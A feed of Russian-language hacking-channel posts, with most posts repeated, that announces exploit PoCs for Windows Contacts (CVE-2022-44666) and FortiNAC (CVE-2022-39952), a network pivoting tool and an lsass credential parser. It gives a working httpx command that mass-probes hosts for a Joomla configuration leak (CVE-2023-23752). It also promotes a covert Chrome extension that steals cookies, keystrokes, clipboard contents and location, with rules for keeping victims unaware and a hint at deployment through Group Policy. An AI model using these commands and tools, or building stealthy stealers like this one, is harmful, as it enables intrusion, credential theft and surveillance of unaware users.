CVE-2022-44666
WriteUp по одной забытой уязвимости Windows (0day): выход атрибута href управления системной ссылкой Microsoft Windows Contacts (VCF/Contact/LDAP), который не был полностью исправлен как CVE-2022-44666 в исправлениях, выпущенных в декабре 2022 года. А значит, жир еще впереди.
POC в наличии
Go
#win #poc #vuln
WriteUp по одной забытой уязвимости Windows (0day): выход атрибута href управления системной ссылкой Microsoft Windows Contacts (VCF/Contact/LDAP), который не был полностью исправлен как CVE-2022-44666 в исправлениях, выпущенных в декабре 2022 года. А значит, жир еще впереди.
POC в наличии
Go
#win #poc #vuln
GitHub
GitHub - j00sean/CVE-2022-44666: Write-up for another forgotten Windows vulnerability (0day): Microsoft Windows Contacts (VCF/Contact/LDAP)…
Write-up for another forgotten Windows vulnerability (0day): Microsoft Windows Contacts (VCF/Contact/LDAP) syslink control href attribute escape, which was not fully fixed as CVE-2022-44666 in the ...
😱4👍3🔥3
CVE-2023-23752
Joomla webservice endpoint access
PoC
Joomla webservice endpoint access
PoC
httpx -l ip.txt -path '/api/index.php/v1/config/application?public=true'😱16🔥4👍3
HIVE
Мы продолжаем следить за наработками @c4s73r и сегодня он зарелизил HIVE.
В личной переписке он сознался что - смотреть скриншот
VLAN L2 Pivoting Instrument
#network #hacking
Мы продолжаем следить за наработками @c4s73r и сегодня он зарелизил HIVE.
В личной переписке он сознался что - смотреть скриншот
VLAN L2 Pivoting Instrument
#network #hacking
🔥24👍7😱3
CVE-2022-39952 Fortinet FortiNAC
CVSS score of 9.8
Продукты, затронутые уязвимостью:
FortiNAC version 9.4.0
FortiNAC version 9.2.0 through 9.2.5
FortiNAC version 9.1.0 through 9.1.7
FortiNAC 8.8 all versions
FortiNAC 8.7 all versions
FortiNAC 8.6 all versions
FortiNAC 8.5 all versions, and
FortiNAC 8.3 all versions
POC exploit
#forti #poc
CVSS score of 9.8
Продукты, затронутые уязвимостью:
FortiNAC version 9.4.0
FortiNAC version 9.2.0 through 9.2.5
FortiNAC version 9.1.0 through 9.1.7
FortiNAC 8.8 all versions
FortiNAC 8.7 all versions
FortiNAC 8.6 all versions
FortiNAC 8.5 all versions, and
FortiNAC 8.3 all versions
POC exploit
#forti #poc
👍13🔥3😱3
Давайте создадим расширение для Chrome, которое крадет ВСЁ
*
Ключевые правила:
1.Пользователь не должен знать, что за кулисами что-то происходит.
2.Не должно быть никаких визуальных признаков того, что что-то не так.
3.Никаких дополнительных консольных сообщений, предупреждений или ошибок.
4. Нет дополнительных предупреждений браузера или диалогов разрешений.
5.Нет дополнительного сетевого трафика на уровне страниц.
*
В итоге мы воруем:
- Cookies
- History
- Screenshots
- User Navigation
- Page Traffic
- Keylogger
- Input Capturing
- Clipboard Capturing
- Capturing Geolocation
- Stealth Tab
*
Залить все это в Chrome Web Store конечно нереально))) А вот залить через GPO ... в общем дальше сами )
spy-chrome-extension
#chrome #extension
*
Ключевые правила:
1.Пользователь не должен знать, что за кулисами что-то происходит.
2.Не должно быть никаких визуальных признаков того, что что-то не так.
3.Никаких дополнительных консольных сообщений, предупреждений или ошибок.
4. Нет дополнительных предупреждений браузера или диалогов разрешений.
5.Нет дополнительного сетевого трафика на уровне страниц.
*
В итоге мы воруем:
- Cookies
- History
- Screenshots
- User Navigation
- Page Traffic
- Keylogger
- Input Capturing
- Clipboard Capturing
- Capturing Geolocation
- Stealth Tab
*
Залить все это в Chrome Web Store конечно нереально))) А вот залить через GPO ... в общем дальше сами )
spy-chrome-extension
#chrome #extension
👍18😱2🔥1
Ударим ГовноПарсером lsass по приближающимся выходным !
download this shit (вас блин предупреждали)
download this shit (вас блин предупреждали)
👍6